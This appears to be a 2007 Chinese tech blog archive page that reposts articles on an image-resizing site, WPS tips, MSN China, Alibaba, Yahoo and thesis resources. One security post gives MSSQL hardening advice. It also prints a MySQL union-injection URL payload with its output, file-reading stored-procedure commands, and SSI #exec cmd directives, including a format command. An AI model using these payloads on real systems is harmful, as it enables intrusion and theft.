• 2007年10月24日

    奇妙一下,来试试有趣的在线缩图 - [软件学院]

    奇妙一下,来试试有趣的在线缩图

    出处:PConline

    作者:阎皓的皓

      看清楚哦,是缩图不是缩略图哦。

      经常进行图片处理的朋友一定知道,如果我们对图片不是等比例进行缩放的话,就容易出现失真情况。这时候就需要用Photoshop等专业软件进行后期处理,比较麻烦。如果采用了seam carving(缝合雕刻)技术的话,就不会因为拖动网页边框调整窗口大小,而出现图片失真。这里介绍一个Rsizr网站,该网站就采用了seam carving技术,在调整图片大小的时候,就如同拖动网页边框调整窗口大小时,页面元素(文字、图片)重新紧凑抑或松散排布一样。能够极大程度地减少因图片不等比例缩放等所带造成的失真。网址:http://rsizr.com/

      导入图片

      首先我们登录Rsizr网站,然后点击首页的Open a picture to get started!按钮来选择要进行处理的图片(图1),支持jpg、jpeg、gif和png四种图片格式(图2),然后图片就会上传到Rsizr网站当中去(图3)。



    图1 主页面



    图2 支持格式

    Rsizr网站的基本功能

      图片导入到Rsizr网站之后,会在网站的正中部分进行显示(图4)。Rsizr网站支持普通的图片裁剪功能,点击主页面的Rescale按钮,就会弹出一个图片设置窗口,在这里就可以改变图片的大小,如果选择上Maintain Proportions的话,则图片按照等比例大小改变(图5)。除了可以手动设置图片大小之外,还可以直接用鼠标拖拽图片,从而改变大小(图6)。此外在Rsizr网站中还可以对图片进行翻转操作(图7),进行顺时针和逆时针旋转,要是在操作的过程中出现什么问题,可以点击revert按钮恢复上一步操作。



    图4 操作界面



    图5 改变比例



    图6 改变大小



    图7 翻转图片Rsizr网站的基本功能就先介绍到这里,下面介绍的是Rsizr网站的seam carving技术!利用这个技术我们可以在缩放时固定图片中特定区域的大小,或者可以在缩小时让特定的区块被周围图像缝合消除,并且因为seam carving的缝补算法,你可以让图片缩放后仍然维持整体的完整性。

      点击Rsizr网站的retarget按钮,进入到seam carving裁剪界面,会在主界面的右边看到了四个新增按钮,左至右分别为图片缩放、Preserve(保护特定区域笔刷)、Remove(移除特定区域笔刷)、和Erase(抹去前面的区域设定笔刷)。当你点选后面三个笔刷工具时,就可以利用像绘图软件一样的涂抹方式,来画出特定区域,并且你还可以设定笔刷的大小(图8)。下面就来结合实例,来讲解一下如何运用seam carving裁剪。



    图8 笔刷

      seam carving裁剪实例(一)

      先在Rsizr网站中打开图片,然后选择要进行调整的图片,然后点击Preserve按钮,在笔刷的尺寸上选择100px,接下来根据(图9)的位置进行涂抹,要是有涂抹错误的地方,点击Erase按钮,将错误的地方清除,涂抹后点击done按钮完成设置。



    图9 涂抹

      接下来就开始调节上方与左方的宽度、高度分析调整杆,在调节的同时,图片就会出现正在被解析扫描的画面,调整杆拉动的距离多少,影响到接着你可以调整的图片宽度、高度范围(图10)。稍等片刻,Rsizr网站就会对图片分析完,下面要做的就可以拖拽图片的大小,这时候会发现,我们在拖拽图片的过程当中,图片不会因为大小的改变,而失真(图11)。当然图片调整要适当,如果调整过大的话,一样会出现失真的情况。



    图10 自动调整



    图11 拉伸效果

    seam carving裁剪实例(二)

      如果要想将图片中的物体距离拉近的话,就要点击Remove按钮,在要进行缩减的位置进行涂抹(图12)。其他的方法跟上面的操作步骤一样,对图片分析完之后,就可以通过拖拽图片的大小,来减少物体之间的距离(图13)。我们就会惊奇的发现,原本两个物体之间的距离,已经缩小的非常少了。



    图12 缩减距离



    图13 缩减后效果

      保存图片

      图片处理完之后,最后点击Rsizr网站上的Save Picture按钮来保存图片。在保存图片的时候可以选择图片的格式,有jpg和png两种格式可供选择。在下面选择保存图片的质量,都选择好之后,点击save按钮保存图片。要是还想修改的话,点击Return to editor按钮回到编辑界面,继续对图片进行调整。

    活学活用 WPS 2007拼音指南入门

      作者:刘长德

      中国的汉字博大精深,就早期的GB2312收录的简体汉字就已达六千多个。每一个汉字都有其不同的独特含义,因此,也就赋予了汉字更多的特点,有的是音同字不同,有的则是字同音不同,即使同一个汉字使用的位置不同,表达出的含义也有天壤之别,因此这也就增加了汉字的认知与学习的难度。

    在常用的六千多个汉字中,由于每个人文化水平存在差异,对汉字的认识程度也参差不齐,以至出现“有边的读边,没边的读中间”,也就不足为怪了。在日常工作中,偶然遇到不认识的汉字是常有的事,多数人会说:查字典呀!可又有多少人将字典时时都放在身边?这时WPS2007拼音指南就可以帮个大忙。

    一、巧识陌生字(多音字)

    首先是打开WPS文字,输入不认识的汉字(可以是一个字,也可以是一组词),使用拼音输入的朋友可以采取复制的办法,然后打开WPS文字,进行粘贴,再点击“格式—中文版式—拼音指南”,在打开的“拼音指南”窗口中,即可自动显示该字或词组的拼音了。

    此时该字要是个多音字,只要是在“拼音文字”中点击鼠标,就会出现一个下拉三角,用鼠标点击下拉三角,就能显示出该字的其它读音了(如图01)。



    图1 显示读音

    二、文字注音有技巧

    当我们在用WPS编辑文档时,偶尔会用到个别的疑难杂字,由于是不常见汉字,读错音也就在所难免,为了避免这种情况发生,最好是能给该字注音。按照以往惯例,如果直接使用拼音指南,标注的拼音会在文字的上方,使行距发生变化,至使与其它行距极不协调,对页面造成一定的影响。此时我们可以这样,首先是用鼠标选中该字,点击“格式—中文版式—拼音指南”,在打开的“拼音指南”窗口中,将该字的拼音选中并复制,关闭“拼音指南”窗口,在文字后面插入括号,将拼音粘贴到括号内即可(如图02)。



    图2 在文档中进行文字注音
    Tag:在线服务 图片处理 WPS 技巧
    chapi 发表于20时52分35秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月24日

    打造抵御SQL注入攻击的MSSQL服务器 - [安全资讯]

    打造抵御SQL注入攻击的MSSQL服务器

    MS SQL SERVER的安全性问题一般是由于配置不当而引起,攻击者可通过这样的配置获得很高的权限来执行SQL指令(如:sp_addlogin,xp_subdirs的存储过程),配置一台安全可靠的MS SQL SERVER对你的网站整体安全会起到关键性作用!让我们一起来看一看:

    1.用户权限分布

    用户分配的权限有两种:

    (1)网络空间提供商提供的MS SQL账号,一般这类型账号的权限是db_owner,也就是数据库所有者,拥有管理个人数据库文件的所有权限,针对自己的那个库文件,无法跨越别人的库文件,针对MASTER还有一定的权限。

    (2)主机托管,这类型的主机的MS SQL的权限,有很大一部分能达到SYSADMIN服务器角色组,相对来说这类型网站,被入侵的几率达到99%。

    权限的安全合理配置是至关重要的,对于使用网站程序调用SQL数据库的配置,更加重要。首先,用于程序连接数据库的用户应拒绝使用服务器角色组成员,应使用数据库用户角色组的成员,最好的方法是只给予db_reader,db_writer权限,遇到有需要备份的用户请另行新建用户——注意:只要有备份权限就可以通过BACKUP得到WEBSHELL!使用db_redaer,db_wirter不能直接用SQL指令建表,但是对于网站的安全也起到了至关重要的作用,入侵者无法使用create talbe,想进一步获取服务器信息,无处保存。那当然,低权限也会给入侵者带来读表的权限,所以说合理的数据库权限,给你的网站安全加了一道墙。

    2.数据库存储过程的分配

    删除所有对数据库可有可无的存储过程、对注册表操作的扩展进程:

    Xp_regaddmultistring

    Xp_regdeletekey

    Xp_regdeletevalue

    Xp_regenumvalues (通过它可获得所以网页目录)

    Xp_regread (对Public可以执行) (通过它可获得默认网页根目录,“\”)

    Xp_regremovemultistring

    Xp_regwrite

    很多人只留意到这几部分,还有一组:

    xp_instance-regaddmultistring

    xp_instance_regdeletevalue

    xp_instance_regenumkeys

    xp_instance_regread

    xp_instance_regremovemultistring

    部分重要的存储过程(以下的这些存储进程使用的权限达到DBO以上):

    xp_cmdshell(现在几乎所有的服务器都通杀了)

    xp_dirtree (查看目录树,由些了解你目录的

    xp_subdirs (用起来就跟DIR C:\一样,不过显示的只是目录)

    xp_fileexist,用来确定一个文件是否存在。

    xp_getfiledetails,可以获得文件详细资料。

    sp_OACreate (通过它,危害很得更大,但是要有有SYSADMINS权限才可能使用)

    sp_OAGetErrorInfo

    sp_OAGetProperty

    sp_OAMethod

    sp_OASetProperty

    sp_SetProperty

    sp_OAStop

    使用下面的存储过程:

    xp_makecab(dbo.xp_makecab ’c:\test.cab’,’mszip’,1,’C:\Inetpub\wwwroot\SQLInject\login.asp’,

    ’C:\Inetpub\wwwroot\SQLInject\securelogin.asp’)

    如果入侵者使用conn.asp,dbconn.asp,databaseconn.asp这类的配置文件,就能找出目录,再用上面的命令就可以把你的程序打包再下载,

    你的SQL密码将被一览无疑(建议连接密码文件加密):

    xp_makewebtask (用WEB作业得到WEBSHELL)

    xp_runwebtask

    xp_readerrorlog(读取出错的记录,但我们可能它来读取文件exec master.dbo.xp_readerrorlog 1,’c:\inetpub\wwwroot\dvbbs\conn.asp’)

    3. 程序的安全

    程序的安全问题危害到了MS SQL,下面是一些注意事项:(1)书写程序,带值输入应详细过滤如(’,;,=,update,select,insert,create,",--, exec, execute等等)用来执行指令的关键字。有人已经研究出如果避过’分号来得到权限,但是如果你有语句中加入:

    (if instr(request("id"),",")>0 or instr(request("id"),"insert")> or instr(request("id"),";")>0 then ’根据以上提供的那些得、重复加上,这些举例)

    response.write "<script language=script>javascript:history.go(-1);</script>

    response.end

    end if

    )

    发现这些字符就跳回来出的页面,使得攻击者无法判断信息是否正确,通过页面变量直接取值的,请使用request.Querysring,可防止入侵者使用POST:

    if instr(request.querysring("id"),",")>0 or instr(request.querystring("id"),"insert")> or instr(request.querystring("id"),";")>0 then ’根据以上提供的那些得、重复加上,这些举例)

    response.write "<script language=script>javascript:history.go(-1);</script>

    response.end

    end if

    (2)改掉预设的WEB虚拟路径,不要使用IIS装好的预设(系统所在碰碟)\Inetpub\wwwroot路径,网页目录最好不要放在C盘。

    (3)利用 On Error Resume Next 排除网页出错,或使用:

    if Err.Number<>0 then

    response.write redirect url

    end if

    重定向到你指定的系统页面删除或修改默认的出错页面(重点是500出错页面),修改默认出错页面,让入侵者无法参考出错信息。

    4.系统的配置

    (1)使用防火墙关闭TCP 1433/UDP 1434端口对外连接

    (2)升级最新的补丁(关注微软发布的补丁文件,是备及时修改,最新MS SQL 2000 SERVER有SP4补丁了)

    (3)检查系统的是否存在弱口令用户,一旦出现就要及时修改密码。

    最后,网站的安全还是要靠广大程序来共同维护,一时麻痹大意思将你的网站很大的灾难,SQL INJECTIONS可谓真是防不胜防,这些方面也不单单是MS SQL,包括ORACLE、SYBASE、MYSQL等等,希望能创造出好的网络环境。

    MySQL注射时ErrorNo.1267的突破过程

    测试个国外的站时:

    url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*

    返回错误:

    Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ’UNION’

    MySQL Error No. 126

    看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。

    解决办法:转为其他编码如hex。

    url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*

    成功得到hex(version())的值为:

    342E312E332D62657461

    回Mysql查询下得到:

    mysql> select 0x342E312E332D62657461;

    +------------------------+

    | 0x342E312E332D62657461 |

    +------------------------+

    | 4.1.3-beta |

    +------------------------+

    1 row in set (0.00 sec)

    黑客探讨之在浏览器下执行exe文件

    一:真的能在浏览器中执行命令文件吗?

    答案是肯定的。不过先别高兴,只能执行服务器端的,而且是必须经过授权的。否则服务器想黑你就太容易了,谁敢看我我就格式化谁。

    二:他是如何实现的。是靠asp文件吗?

    在服务器端执行文件是靠SSI来实现的,SSI时服务器端包含的意思(不是SSL),我们经常使用的#include就是服务器端包含的指令之一。不过,这次要介绍的就是——#exec。就是他可以实现服务器端执行指令。

    不过,这次他不能用于.asp的文件。而只能用.stm、.shtm和.shtml这些扩展名。而能解释执行他们的就是Ssinc.dll。所以,你写好的代码必须保存成.stm等格式才能确保服务器能执行。

    三:如何执行呢?

    终于开始讨论实质性问题了。

    它的语法是:

    CommandType是参数,他有两个可选类型:

    1.CGI运行一个应用程序

    如CGI脚本、ASP或ISAPI应用程序。

    CommandDescription参数是一个字符串。此字符串包含应用程序的虚拟路径,后跟一个问号以及传送给应用程序的任一参数,参数之间由加号分隔(+)。

    他可是#exec命令最有用的参数,也是#exec命令存在的大部分理由。他可以处理已授权的CGI脚本,或Isapi应用程序。微软为了向下兼容一些早期的ISAPI应用程序,而创建了该项命令。我们知道,微软早期的WEB应用程序都是靠ISAPI解释的,而且也兼容CGI程序。你现在也可以在你的 WEB根目录中找到CGI-BIN的目录。

    我们可以用一下例子说明。<!--#execcgi="/CGI-BIN/chat.exe?user+passw"-->

    这种命令我们在一些UNIX主机上可以经常见到。现在,我们也可以在自己的.shtml中运用他了。当然,如果服务器允许的话。

    还有一种类型的程序:<!--#execcgi="/CGI-BIN/login.dll?name"-->

    这种命令方式将启动一个进程外的程序来解释并动态输出信息到网页上。这种方式不常见。但你仍然可以在一些网站中见到。

    2.CMD参数

    他可是#exec命令中最可怕的参数,也是#exec命令禁止使用的大部分理由。他也是我们一些网友实现最终幻想的利器。可惜,要得到我们幻想的招数有些困难,也几乎是不可能的。

    以下是微软关于CMD参数的说明,你一定要读明白再试!

    CMD运行shell命令。CommandDescription参数是一个字符串,其中包含shell命令程序的完整物理路径,后跟由空格分隔的任何命令行参数。如果没有指定全路经,Web服务器将搜索系统路径。默认情况下,该指令是被禁用的,这是因为它会对Web站点造成安全方面的危险;例如,用户可能使用format命令格式化您的硬盘。

    我本人建议关闭,因为现在微软也不推荐用这个命令。不过,如果你是服务器的管理员,可以试一试。

    你可以新建一个test.shtml的文件,然后在首行设置一个命令。

    <!--#execcmd="c:\winnt\system32\help.exe"-->

    ’NT中的一个帮助文件(没有危险)。

    或试一试!

    <!--#execcmd="c:\windows\command\mem.exe"-->

    ’window98下的显示内存的一个命令。(没有危险)

    然后你在该虚拟目录中将其权限设为脚本,或可执行。

    最后,你可以在浏览器中输入该地址http://localhost/xxx/test.shtml如果你看到浏览器中显示了他们的屏幕输入信息。那么,恭喜你。你试成功了。

    四:最终幻想

    如果我们想执行多的命令呢?那么闭上眼,往下看吧。

    首先,你打开注册表编辑器(记住要先备份),然后找

    KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC4

    ’也可能是w3svc\Parameters

    选择新建一个Dword值SSIEnableCmdDirective,它的两个值为0,1。下面是微软的说明。

    服务器端的#execcmd命令包括可执行外壳命令。安全意识强的站点希望通过将此值设置为0来关闭#execcmd命令,并以此作为外加的安全防范,尤其是在允许不受信任的使用者将文件放置到服务器时更是如此。默认状态下,注册表中不存在此值;要允许该命令执行外壳命令,必须先创建此值并将值设置为1。

    还可以在添一个Dwordd值AllowSpecialCharsInShell它的两个值为0,1。下面是微软的说明。

    范围:0,1默认值:0(禁用)

    本值控制在运行批处理文件(.bat和.cmd文件)时,是否允许在命令行使用[(,;%<>]等Cmd.exe特殊字符。这些特殊字符可能引发严重的安全隐患。如果该项值设置为1,心怀叵测的用户可以在服务器上随意执行命令。因此,强力推荐用户保留其默认设置0。默认情况下,这些特殊字符不能传递到脚本映射CGI程序。如果设置为1,除了管道符号和标准I/O重定向符(<和>)之外(这两类字符在命令处理器中具有特殊含义),这些特殊字符都能够传递到脚本映射CGI程序。

    下面我就不详述了。不过你要执行一些你希望的命令可不是这么简单(如:<!--#execcmd="c:\winnt\system32\format.com/ya:"-->)你不会成功的,如果死机不要怨我。

    Tag:SQL 注入 攻击 服务器 防范 黑客
    chapi 发表于20时48分59秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月24日

    MSN中文网渐成“鸡肋” 频道激增模式未变 - [IT业界]

    MSN中文网渐成“鸡肋” 频道激增模式未变

    出处:赛迪网

      当九城拟收购MSN中国50%股份的传言甚嚣尘上之时, MSN中文网近期又新增时尚、招聘和万象三个频道。记者发现,在新增的三个频道中,除招聘频道为zhaopin.msn.com.cn形式的自有域名之外,其他两个频道的域名都包含了其合作伙伴的域名,如时尚频道的msn.yoka.com和万象频道的msn.phoenixtv.com,可见MSN如今又悄然增加了Yoka和凤凰网两个伙伴。至此,MSN在华已拥有近30家合作伙伴。

      借鸡下蛋

      MSN中国实际上本来还有个本土化的名字--上海美斯恩网络通讯技术有限公司,它是微软和上海联合投资公司于2005年4月8日共同投资成立的,双方各持股50%。微软通过这种合资方式,绕过政策限制,把MSN门户、搜索和无线增值等业务全面带入中国。

      在MSN中国创建之初,它就采用了与众多专业网站合作共建的模式,最初就与中国本土9家互联网公司达成合作,将旗下频道全部外包出去。在Yoka和凤凰网成为MSN中文网合作伙伴之前,已有天极、和讯、携程、东方网等24家网站与MSN中文网达成合作。

      根据MSN官方透露,MSN即时通讯软件目前在中国国内的下载量已超过6000万,其中绝大多数用户都是城市白领。倚仗自己所拥有庞大的用户量,MSN中文网在创立之初就开始采用“借鸡下蛋”的经营模式,即借助于中国市场上已经运作成熟的知名网站,不断丰富自己的内容,然后通过卖广告来实现盈利。不仅如此,这些网站还需要向微软缴纳昂贵的费用,此前就有消息称“入场费”高达400万元。

      围城+鸡肋

      虽然高额的“入场费”并没有阻挡众多网站争相加入MSN联盟,但是MSN中文网却始终像是一座围城,“城外的人想进去,城里的人想出来。” MSN初进中国时与其进行频道合作的9个合作伙伴,如今大多数都已和它分道扬镳。其中,社区频道就接连换了三家,平均每年更换一次,从最初的猫扑,到后来的奇虎,一直到现在的MySpace中国。

      日前有消息称,上海联和投资有限公司因为MSN中国经营情况不如预期,未来的发展方向不明,决定抽身退出,并已经开始积极寻找买家,接盘其手中的50%股份。艾瑞咨询公司侯涛分析认为,九城很有可能收购MSN中国。同时,他还表示:“MSN中国此前运营并不是很成功,而且九城没也有过类似的运营经验,所以买来之后很可能是烫手山芋。”

      MSN中文网虽然很聪明地靠出售频道获利,然而毕竟在影响力上却无法追上新浪、搜狐等几大门户,这也最终导致它与合作伙伴之间“貌合神离”。总体说来,采用外包并没有给MSN中文网带来很好的赢利模式。另外,微软全球战略的调整也影响到MSN中文网的命运,MSN旗下的即时通讯业务和邮箱等都将由“WindowsLive”来统辖,这样MSN中国仅剩MSN中文网,业界人士甚至称其为“鸡肋”。

      Yoka、凤凰网如今勇敢地迈进入了MSN中文网这座围城,相信将来它们也一定能获得与先行者同样的实际利益,例如扩大行业影响力、增加网站访问量等等,然而花费不菲的费用来获取这些是否值得,也只能等它们将来慢慢去体会。不过,在合作伙伴不断新人换旧人的情况下,MSN中国这种“借鸡下蛋”的模式是否能够长久,确实值得微软仔细思考。当所有的“金鸡”都借完的时候,MSN中国还能下出“金蛋”吗?

    李彦宏忠告学子:技术满足市场需求才有价值

      日前,在南京大学科技馆,百度董事长兼首席执行官李彦宏面对近千名大学生发表演讲。他对在座的青年学子发出邀请,称希望对互联网感兴趣的顶尖毕业生都能到百度工作,应届生最高年薪可达30万元。他同时表示,在百度,毕业生能够获得超出从任何一个其他跨国公司所能获得的成长和回报。

      李彦宏对应届毕业的大学生发出忠告:技术只有满足需求才有价值。正因为缺少实现技术价值的空间,大学中学业成绩最好的同学有可能并不在日后的工作中取得更大的成就。

      虽然已经身为市值超过百亿美金的互联网公司的CEO,但被称为“全球搜索技术前三名”的李彦宏仍然不改工程师本色,在业界以爱才惜才而闻名,称自己“将自己1/3的工作时间用在招揽人才上。”对于给应届生开出30万元的年薪,李彦宏表示:这并不过分,因为互联网公司最值钱的不是房产、不是服务器,而是互联网人才。”

      记者了解到,做为中国到达率最高、响应速度最快和最稳定的网站,百度每天都保障上亿用户以亚秒级速度使用百度服务。此因此,“工程师一进入百度就能够接触到国内最先进的最核心的产品技术,所有研发部门的员工都是直接面向用户需求,产品研发出来能够立即付诸应用,员工能够获得加速成长。”

    阿里巴巴IPO将成中国互联网行业分水岭

      导语:《商业周刊》网站今天发表分析文章称,阿里巴巴B2B业务上市不仅仅是阿里巴巴的一件大事,同时也有可能成为中国互联网行业的分水岭。

      中国互联网行业的分水岭

      阿里巴巴B2B业务的首次公开招股(IPO)吸引了投资者的高度关注。10月22日,阿里巴巴创始人、CEO马云通过视频会议发表讲话,披露了旗下B2B业务的IPO细节。阿里巴巴B2B预计通过IPO融资约15亿美元,承销商为高盛和摩根士丹利。阿里巴巴B2B将于11月6日在香港联交所上市。

      阿里巴巴B2B上市并不只是该公司的一件大事,同时也可能成为中国互联网行业的分水岭。到目前为止,中国已经有超过1.6亿名网络用户,是仅次于美国的全球第二大互联网市场。尽管百度和新浪等在纳斯达克上市的中国互联网公司通过销售网络广告取得了优异的业绩,但到目前为止,还没有一家中国电子商务公司吸引投资者的太多关注。

      长期以来阻碍中国电子商务市场发展的“绊脚石”已经有松动的迹象。过去几年里,很多通过网络销售商品的公司都艰难度日,难以吸引大量的中国消费者。一个重要原因是,信用卡在中国并不普及,消费者如何为网络购物买单是一个难题。随着信用卡在中国日益普及,这一局面正在发生变化。与此同时,企业和银行还联合推出了其它推动网络支付普及的方式,例如阿里巴巴旗下的支付宝。

      网络购物处于初级阶段

      市场研究公司BDA中国的分析师刘斌(音译)表示:“整个体系都在进步。到目前为止,中国已经出现近50家第三方支付公司。中国电子商务市场目前仍然处于初级阶段,但在不久的将来,年轻用户将逐步改变消费习惯,更多人将会接受电子商务。”网络购物也许在走下坡路,但投资者对于其它中国网络股的兴趣依然浓厚。尽管近期大幅下滑,但百度股价今年以来仍然上涨了180%。与此同时,新浪股价上涨了80%,搜狐上涨69%。

      中国网络游戏市场也是一个热门投资领域。今年以来,盛大股价上涨了70%。盛大今年第二季度销售额为7500万美元,同比增长39%;净利润为5500万美元,同比增长200%以上。当然,并非所有中国网络游戏股都是投资者的宠儿。盛大主要竞争对手网易和九城的股价虽然也有所上涨,但涨幅无法同盛大相提并论。

      豪赌北京奥运会

      但是,这并未能阻止更多中国网络游戏公司进入股票市场。例如,完美时空7月26日在纳斯达克上市,IPO发行价为每股16美元,最终融资1.89亿美元。截至10月11日,完美时空股价涨至34美元,较IPO发行价上涨一倍以上。10月9月,中国网络游戏运营商金山在香港联交所上市,上市交易首日股价大涨39%。10月18日,另一家中国网络游戏运营商巨人网络在提交给美国证券交易委员会的文件中披露,该公司计划通过IPO融资8亿美元,并在纽约证券交易所上市。

      中国几大互联网门户都于网络泡沫时期在纳斯达克上市,泡沫破碎之后,它们一度成为投资者的“弃儿”。但是,这些公司现在又重新获得了投资者的青睐。今年以来,新浪和搜狐的股价大幅上涨,主要由于投资者对于北京奥运会之前的中国网络广告市场充满信心。摩根士丹利预计,中国互联网广告市场的总产值将于2008年达到24亿美元,比2007年增长约45%。

      很多中国新兴互联网公司虽然还未上市,但也吸引了更多投资。千橡互动集团拥有多个中国最受欢迎的Web2.0网站,包括类似Facebook的校内网。千橡互动集团CEO陈一舟声称,该公司第三季度广告营收同比增长一倍。他说:“从去年来看,我们的广告营收将达到1500万美元。种种迹象表明,北京奥运会相关广告预算已经开始进入市场。”

      打造品牌知名度

      即使在北京奥运会结束之后,中国网络广告市场有望继续保持强劲的增长势头,这主要得益于很多中国互联网公司在本土消费者中建立了品牌知名度。对于陈一舟等中国互联网行业的高管来说,这无疑是一个好消息。摩根士丹利分析师季卫东表示:“越来越多的中国公司将打造品牌知名度放在高优先级的位置,而在此之前,它们更倾向于打价格战。”

      季卫东同时表示,中国网络广告市场当前的最主要动力是北京奥运会。但随着更多中国公司关注品牌影响力,中国网络广告市场有望长期保持上升趋势。(孟帆)
    Tag:MSN 互联网 李彦宏 阿里巴巴
    chapi 发表于20时44分08秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月24日

    雅虎再瘦身 明年初关闭博客社交服务雅虎360 - [IT业界]

    雅虎再瘦身 明年初关闭博客社交服务雅虎360

    作者:令狐达 | 出处:搜狐

      北京时间10月24日消息:据国外媒体报道,本月16日,美国雅虎公司曾经做出一项重要宣布,但是被外界所忽略——那就是宣布明年初将关闭博客和社交服务“雅虎360”。

      在三季度财报会议上,雅虎公司首席执行官杨致远已经明确指出,雅虎公司仍将会取消一些表现平庸、昙花一现的产品,杨致远表示,雅虎360将会过渡到一个更加综合的个人信息服务上去。

      16日,雅虎公司的社区经理马特·沃尔伯顿在360频道发布了关闭服务的通知。他说,预计将在明年年初关闭这一服务。不过,雅虎公司将会确保用户的博客文章、好友列表和照片等内容安然无恙,雅虎公司也将提供工具让用户安全搬家;另外,在新的社交服务推出之前,雅虎公司将会提前通知用户。

      之前,雅虎公司曾经宣布正在测试新的社交服务(个人资料服务)Mash,对于Mash是否会取代雅虎360,沃尔伯顿在文章中表示尚无法给出具体的答案。目前,雅虎公司在测试各种方案,Mash只是其中的一种。

      沃尔伯顿也表示,直到明年关闭服务之前,所有用户仍然可以使用雅虎360服务。

      有美国博客分析称,由于雅虎360服务在美国人气有限,关闭服务的消息并未在业界引发关注甚至报道。

      众所周知的是,在杨致远主政雅虎的前后,雅虎公司开始进行大规模瘦身,雅虎关闭了美国的网上拍卖业务、网上支付账单服务、关闭了雅虎相册服务、关闭了音乐链接聚合服务。

    杨致远:雅虎不会复制Facebook 要走自己的路

    出处:天极网

      北京时间10月24日,据国外媒体报道,雅虎首席执行官杨致远日前在广告公司和出版商官员举行的一次小型会议上发表评论说,雅虎不能成为明天的Facebook,我们要走自己的路。

      杨致远说,我与Facebook首席执行官马克-朱克伯格(Mark Zuckerberg)在一起度过一些时光。我比马克老多了;雅虎要把重点放在它已经拥有的资产上,我们眼前有许多事情要做;雅虎不要复制其它网站做的事情,我想,那不是雅虎的优势。

      不过,他承认,雅虎确实有关于服务方面的社交管理,如“Yahoo Answers”服务。雅虎计划要为此做更多的事情。

      当然,这些说法并不意味着雅虎最终不会竞价收购Facebook的一部分股权,尽管雅虎去年以10多亿美元收购Facebook的竞价失败了。不过,杨志远的评论也许是默认雅虎没有微软和谷歌等竞争对手的资本实力。人们认为这两家公司将是竞价收购Facebook的主要参与者。

    杨致远:担任雅虎CEO是孤独的工作

      新浪科技讯 北京时间10月24日消息,据国外媒体报道,雅虎联合创始人兼CEO杨致远周二在加州半月湾(half moon bay)市举行的会议上表示,担任雅虎CEO其实是一项非常“孤独的工作”,自己经常被迫作出重要决定。

      杨致远在由Right Media主办的会议期间以“闲聊”方式作出了上述表示。Right Media为一家网络广告公司,今年上半年被雅虎收购。鉴于谷歌在搜索及网络广告市场占据了优势地位,杨致远和其他雅虎高管对此进行了反思。杨致远说:“担任CEO是很孤独的工作,你必须作出艰难决定,感觉过去13年中我一直在接受培训。今年年初我感觉到,目前已是时不我待,雅虎需要及时作出市场调整,我们正面临着一些挑战。”

      杨致远称,建立以用户为中心及如同创业公司般的企业文化,对雅虎未来发展至关重要。他说:“在市场业绩好转时,我们应摆正自己所处位置;在处境不佳时,认清企业当前实际状态将有助于摆脱困境。”杨致远认为,过去数年中,雅虎的市场策略已经过多次调整,目前更需要针对市场变化作出调整。他表示:“网络广告的销售方式正发生变化,很多内容来自网民,我们欢迎这些变化并对自身加以调整。”

      杨致远接着表示,通过提供开放环境使网民完成各类活动,通过加强与其他网络公司的合作,使广告商的广告投放更有针对性,雅虎将在新型网络广告市场中独树一帜;对于日渐增长的社交媒体业务,雅虎拥有知识问答搜索引擎Yahoo Answers和图片共享网站Flickr。他说:“我并不认为雅虎将成为Facebook,我们也不想成为Facebook。”尽管未能在美国市场与Facebook、MySpace达成合作协议,但雅虎已向英国最大社交网站Bebo提供广告。

      目前谷歌在搜索广告领域占据领先位置,而雅虎在显示广告领域具有优势。杨致远认为,显示广告的针对性和有效性还有待加强,目前该领域的技术创新还远远不够。他没有讨论最近雅虎一些高管离职的情况,但表示即将离职的首席营销官康米·杜纳威(Cammie Dunaway)为扩大雅虎品牌影响作出了贡献。

      杨致远说:“在我目前所处位置上,我每天都提醒自己,是我开始了这家公司的创业历程,并幸运地选择了雅虎作为公司名称。至今我仍然不明白,我们为何当初会在雅虎后面添加一个感叹号。我们必须重振雅虎品牌,为此我们必须完成大量工作。”(明月)

    雅虎高管承认战略失误 已制定复兴计划

      新浪科技讯 北京时间10月24日消息,据国外媒体报道,雅虎高管周二表示,近年来随着网民行为和网络广告市场的转变,雅虎确实没能及时作出有效调整,但公司目前已经制定出详细复兴计划,其中包括开放平台、提高广告针对性和加强与其他公司合作等具体措施。

      雅虎联合创始人兼CEO杨致远称,雅虎将把拥有的各项内容和服务转化为“出发点”,使用户每天都能回到这些点上,而不是像以前那样设法挽留用户。他说:“实施开放战略后,作为大型出版人的雅虎,将有机会在开放市场中扮演重要角色。”对于杨致远的复出,华尔街曾希望他能采取大幅裁员等激进手段,但雅虎第三季度业绩的好转,为杨致远实施新策略赢得了时间。

      雅虎总裁苏珊·德克尔(Susan Decker)在韩国的新闻发布会上表示,虽然雅虎在网络广告的最初十年间占据领先位置,但对于近年来网络广告市场的新动向和新需求,雅虎确实没能作出及时反应。她说:“我们的步子迈得还不够快。”杨致远复出后,立即为雅虎制定了新策略,希望雅虎借此完成由媒体公司向技术平台的转变,以挽留老用户和发展新用户。

      杨致远说:“雅虎或许仍将扮演大型发行人的角色,但我们正实施的市场策略并不是为了创建发行平台。我们拥有一批功能完善的网站,这就是我们的优势。”他表示,今后将采取有效措施,鼓励用户不断访问雅虎主页、雅虎邮箱、雅虎搜索及移动互联网服务等业务。除开放策略外,雅虎将向广告商提供更多网民活动习惯信息,以使广告投放更有针对性。

      杨致远还表示,雅虎将加强与其他网络公司的合作关系。最近雅虎相继与eBay、康卡斯特( Comcast)及Telefonica等企业达成了合作协议;为适应网络广告市场的转变,雅虎还将大力进军视频和手机服务等业务领域。(明月)
    Tag:雅虎 社交 服务 杨致远
    chapi 发表于20时38分07秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月23日

    毕业论文写作必备的十大网站排行榜 - [资源下载]

    综合论文网站(按网站实力和网站世界排名排列顺序)

    1、维普资讯网推荐指数:★★★★★

    http://www.cqvip.com

    该网站前身是中国科技情报所下属机构,现已发展为国内著名的中文文献论文网,并成为GOOGLE全球战略合作伙伴,拥有医药、化工、经济、社科等60多个科目的2000多万篇论文。目前网站世界排名:6777位。

